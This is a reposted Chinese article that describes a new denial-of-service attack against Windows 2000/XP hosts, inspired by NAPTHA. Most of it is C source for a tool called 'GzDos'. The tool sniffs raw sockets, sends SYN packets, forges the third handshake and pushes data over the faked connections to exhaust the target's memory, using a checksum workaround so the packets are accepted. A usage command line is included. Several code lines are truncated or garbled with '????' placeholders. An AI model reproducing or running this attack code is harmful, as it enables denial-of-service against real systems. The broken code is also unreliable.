新型D.o.S(伪造TCP连接进行数据传输的D.o.S)

类别:软件工程 点击:0 评论:0 推荐:
Author:LionD8
Email:[email protected]
转自安焦
测试平台 VC++6.0 Windows2000 server
目标平台 Windows 2000 , Windows Xp

????突发奇想,受NAPTHA攻击方式的启发,希望能把这种伪造连接的方式扩展到个人的PC上,并且不受局域网的这个条件因素的限制。才去花了时间去研究了一下下面写的东西,好了不废话了。现在拿出来和大家Share一下,还不是很成熟,希望能和大家多多讨论。
????关于NAPTHA原来写过一篇NAPTHA在2000下的实现。为什么要利用一个局域网,仅仅是为了更好的隐藏吗?还有一个更重要的因素应该是避免自己的主机响应远程主机发出的第二此握手的包,防止系统发出RST包断开掉伪造的连接。另外原来测试过NAPTHA对windows系统并没有多大的影响。消耗不到windows的多少内存。如果再伪造连接成功过后再传输数据呢?
????A为攻击者 C被攻击者:
????A Syn --------> C
????A Syn,Ack C
????A 发送数据-----> C
????A Ack C
????A Ack 1)
????{
????????cksum+=*buffer++;
????????size -=sizeof(USHORT);
????}
????if(size)
????{
????????cksum += *(UCHAR*)buffer;
????}
????cksum = (cksum >> 16) + (cksum & 0xffff);
????cksum += (cksum >>16);
????return (USHORT)(~cksum);
}
如果带有数据在20字节的TCP头部的后面,这个和Windows2000系统算出来的就不一样。经过分析和数据长度有关系。如果说20字节的IP头,20字节的TCP头,加2字节的数据。如果用checksum计算出TCP效验和为0x4523.但是系统计算出来的就是0x4323
所以:
tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)+dwSize);
tcpHeader.th_sum = htons(ntohs(tcpHeader.th_sum)-(USHORT)dwSize);
dwSize为带的数据的长度。否则对方不接收伪造的数据包。那么要达到消耗对方内存的目的也不行了。

下面是测试的代码。考虑到此程序还是有一定的危害的效果所以没有写成十分方便的测试程序,需要手工sniffer选项字节。然后在命令行下面输入选项字节。
例如:
GzDos.exe 192.168.248.128 1025 020405B401010402 1000 65534
GzDos.exe

源代码:
#include "stdio.h"
#include "winsock2.h"
#include "windows.h"
#include
#include "wchar.h"

#pragma comment(lib, "ws2_32.lib")

#define SIO_RCVALL????????????_WSAIOW(IOC_VENDOR,1)

char*????ATTACKIP =????"192.168.248.128";
USHORT????ATTACKPORT =????135;
USHORT????StartPort = 1;
int????????SLEEPTIME =????2000;
UCHAR* optbuf = NULL;????//??选项字节
char* psend = NULL;
DWORD len = 0;
USHORT optlen= 0;

typedef struct ip_head??????
{
????unsigned char h_verlen;????
????unsigned char tos;????????
????unsigned short total_len;??
????unsigned short ident;??????
????unsigned short frag_and_flags;
????unsigned char ttl;????????
????unsigned char proto;????
????unsigned short checksum;??
????unsigned int sourceIP;????
????unsigned int destIP;????????
}IPHEADER;

typedef struct tcp_head??
{
????USHORT th_sport;??????????
????USHORT th_dport;????????
????unsigned int th_seq;??????
????unsigned int th_ack;??????
????unsigned char th_lenres;??????
????unsigned char th_flag;??????
????USHORT th_win;??????????
????USHORT th_sum;??????????
????USHORT th_urp;??????????
}TCPHEADER;

typedef struct tsd_hdr??
{
????unsigned long saddr;??
????unsigned long daddr;??
????char mbz;
????char ptcl;??????????????
????unsigned short tcpl;??
}PSDHEADER;

typedef struct attack_obj
{
????DWORD????dwIP;
????USHORT????uAttackPort[11];
????struct attack_obj*????Next;
}ATOBJ;


ATOBJ*????ListAttackObj=0;

////////////////////////////////////////////////////
BOOL????InitStart();
DWORD????GetHostIP();
USHORT????checksum(USHORT *buffer, int size);
DWORD????WINAPI??ThreadSynFlood(LPVOID lp);
void????SendData(DWORD SEQ, DWORD ACK, USHORT SPort, USHORT APort, DWORD SIP, DWORD AIP, char* pBuf,BOOL Isdata,DWORD dwSize);
DWORD?? WINAPI??ListeningFunc(LPVOID lpvoid);
void????Banner();
void debugip ( DWORD dwip);
void ConvertOpt (CHAR* pu);
////////////////////////////////////////////////////

SOCKET sock = NULL;

int main(int argc, char* argv[])
{
????Banner();
????psend = (char*)malloc(800);
????memset(psend,0x38,799);
????psend[799] = 0;
????len = strlen(psend);
????if ( argc < 5)
????{
????????printf("input error!\n");
????????return -1;
????}
????ATTACKIP = strdup(argv[1]);
????ATTACKPORT = atoi(argv[2]);
????CHAR* optbuftemp = (CHAR*)strdup(argv[3]);????
????ConvertOpt (optbuftemp);
????optbuf[3]-=1;
????if ( argc == 5)
????????SLEEPTIME = atoi(argv[4]);
????if ( argc == 6)
????{
????????SLEEPTIME = atoi(argv[4]);
????????StartPort = atoi(argv[5]);
????}
????char HostName[255]={0};
????if ( InitStart() == FALSE )
????????return -1;
????if ( optbuf != NULL)
????{
????????int i=0;
????????struct hostent* lp = NULL;
????????
????????gethostname(HostName,255);
????????lp = gethostbyname (HostName);
????????while ( lp->h_addr_list[i] != NULL )
????????{
????????????HANDLE????h=NULL;
????????????DWORD????dwIP=0;????
????????????dwIP = *(DWORD*)lp->h_addr_list[i++];
????????????h=CreateThread(NULL,NULL,ListeningFunc,(LPVOID)dwIP,NULL,NULL);????????????
????????????if ( h == NULL )
????????????{
????????????????printf("Create ListeningFunc Thread False!\n");
????????????????return -1;
????????????}
????????????Sleep(500);
????????}
????????????ThreadSynFlood(NULL);
????}
????else return -1;
??
????Sleep(5555555);

}

BOOL InitStart()
{
????BOOL flag;
????int??nTimeOver;
????WSADATA WSAData;
????if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)
????{
????????printf("WSAStartup Error!\n");
????????return FALSE;
????}
????ListAttackObj = (ATOBJ*) calloc (1,sizeof(ATOBJ));
????ListAttackObj->dwIP = inet_addr( ATTACKIP );
????ListAttackObj->uAttackPort[0] = htons(ATTACKPORT);
????ListAttackObj->uAttackPort[1] = 0;
????ListAttackObj->Next=NULL;
????sock=NULL;
????if ((sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
????{
????????printf("Socket Setup Error!\n");
????????return FALSE;
????}
????flag=true;
????if (setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag))==SOCKET_ERROR)
????{
????????printf("setsockopt IP_HDRINCL error!\n");
????????return FALSE;
????}
????nTimeOver=2000;
????if (setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char*)&nTimeOver, sizeof(nTimeOver))==SOCKET_ERROR)????????????????????????????????//设置发送的时间
????{
????????printf("setsockopt SO_SNDTIMEO error!\n");
????????return FALSE;
????}????
????return TRUE;
}

DWORD??WINAPI??ThreadSynFlood(LPVOID lp)
{
????ATOBJ* pAtObj = ListAttackObj;
????SOCKADDR_IN addr_in;
????IPHEADER ipHeader;
????TCPHEADER tcpHeader;
????PSDHEADER psdHeader;
????char szSendBuf[1024]={0};
????int i=0;
????while (??pAtObj != NULL )
????{
????????addr_in.sin_family=AF_INET;
????????addr_in.sin_addr.S_un.S_addr=pAtObj->dwIP;
????????ipHeader.h_verlen=(4Next;
????}
????return 0;
}

DWORD GetHostIP()
{
????DWORD dwIP=0;
????int i=0;
????struct hostent* lp = NULL;
????char HostName[255] = {0};
????gethostname(HostName,255);
????lp = gethostbyname (HostName);
????while ( lp->h_addr_list[i] != NULL )
????????i++;
????dwIP = *(DWORD*)lp->h_addr_list[--i];
????return dwIP;
}
????
USHORT checksum(USHORT *buffer, int size)
{
????unsigned long cksum=0;
????while(size >1)
????{
????????cksum+=*buffer++;
????????size -=sizeof(USHORT);
????}
????if(size)
????{
????????cksum += *(UCHAR*)buffer;
????}
????cksum = (cksum >> 16) + (cksum & 0xffff);
????cksum += (cksum >>16);
????return (USHORT)(~cksum);
}

DWORD?? WINAPI??ListeningFunc(LPVOID lpvoid)
{
????SOCKET rawsock;
????SOCKADDR_IN addr_in={0};
????if ((rawsock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
????{
????????printf("Sniffer Socket Setup Error!\n");
????????return false;
????}
????addr_in.sin_family=AF_INET;
????addr_in.sin_port=htons(8288);
????addr_in.sin_addr.S_un.S_addr= (DWORD)lpvoid;
????//对rawsock绑定本机IP和端口
????int ret=bind(rawsock, (struct sockaddr *)&addr_in, sizeof(addr_in));
????if(ret==SOCKET_ERROR)
????{
????????printf("bind false\n");
????????exit(0);
????}
????DWORD lpvBuffer = 1;
????DWORD lpcbBytesReturned = 0;
????WSAIoctl(rawsock, SIO_RCVALL, &lpvBuffer, sizeof(lpvBuffer), NULL, 0, &lpcbBytesReturned, NULL, NULL);
????while (TRUE)
????{
????????SOCKADDR_IN from={0};
????????int??size=sizeof(from);
????????char RecvBuf[256]={0};
????????//接收数据包
????????ret=recvfrom(rawsock,RecvBuf,sizeof(RecvBuf),0,(struct sockaddr*)&from,&size);
????????if(ret!=SOCKET_ERROR)
????????{
????????????// 分析数据包
????????????IPHEADER *lpIPheader;
????????????lpIPheader=(IPHEADER *)RecvBuf;
????????????if (lpIPheader->proto==IPPROTO_TCP && lpIPheader->sourceIP == inet_addr(ATTACKIP) )
????????????{
????????????
????????????????TCPHEADER *lpTCPheader=(TCPHEADER*)(RecvBuf+sizeof(IPHEADER));
????????????????//判断是不是远程开放端口返回的数据包
????????????????if ( lpTCPheader->th_flag==0x12)
????????????????{
????????????????????if ( lpTCPheader->th_ack == htonl(0x00198289) )
????????????????????{//伪造第3次握手
????????????????????????SendData(lpTCPheader->th_ack,htonl(ntohl(lpTCPheader->th_seq)+1), \
????????????????????????lpTCPheader->th_dport,lpTCPheader->th_sport,lpIPheader->destIP,lpIPheader->sourceIP,NULL,FALSE,0);
????????????????????????//主动发出一次数据
????????????????????????SendData(lpTCPheader->th_ack,htonl(ntohl(lpTCPheader->th_seq)+1), \
????????????????????????lpTCPheader->th_dport,lpTCPheader->th_sport,lpIPheader->destIP,lpIPheader->sourceIP,psend,TRUE,len);
????????????????????}
????????????????
????????????????}
????????????????else
????????????????{
????????????????????if ( lpTCPheader->th_flag == 0x10 )
????????????????????//继续发送数据
????????????????????SendData(lpTCPheader->th_ack,lpTCPheader->th_seq,\
????????????????????lpTCPheader->th_dport,lpTCPheader->th_sport,lpIPheader->destIP,lpIPheader->sourceIP,psend,TRUE,len);
????????????????}

????????????}????????????
????????????
????????}
????}???? // end while

}

void SendData(DWORD SEQ, DWORD ACK, USHORT SPort, USHORT APort, DWORD SIP, DWORD AIP, char* pBuf, BOOL Isdata,DWORD dwSize)
{
??
????SOCKADDR_IN addr_in;
????IPHEADER ipHeader;
????TCPHEADER tcpHeader;
????PSDHEADER psdHeader;

????char szSendBuf[1024]={0};
????addr_in.sin_family=AF_INET;
????addr_in.sin_port = APort;
????addr_in.sin_addr.S_un.S_addr = AIP;
????ipHeader.h_verlen=(4

本文地址:http://com.8s8s.com/it/it35997.htm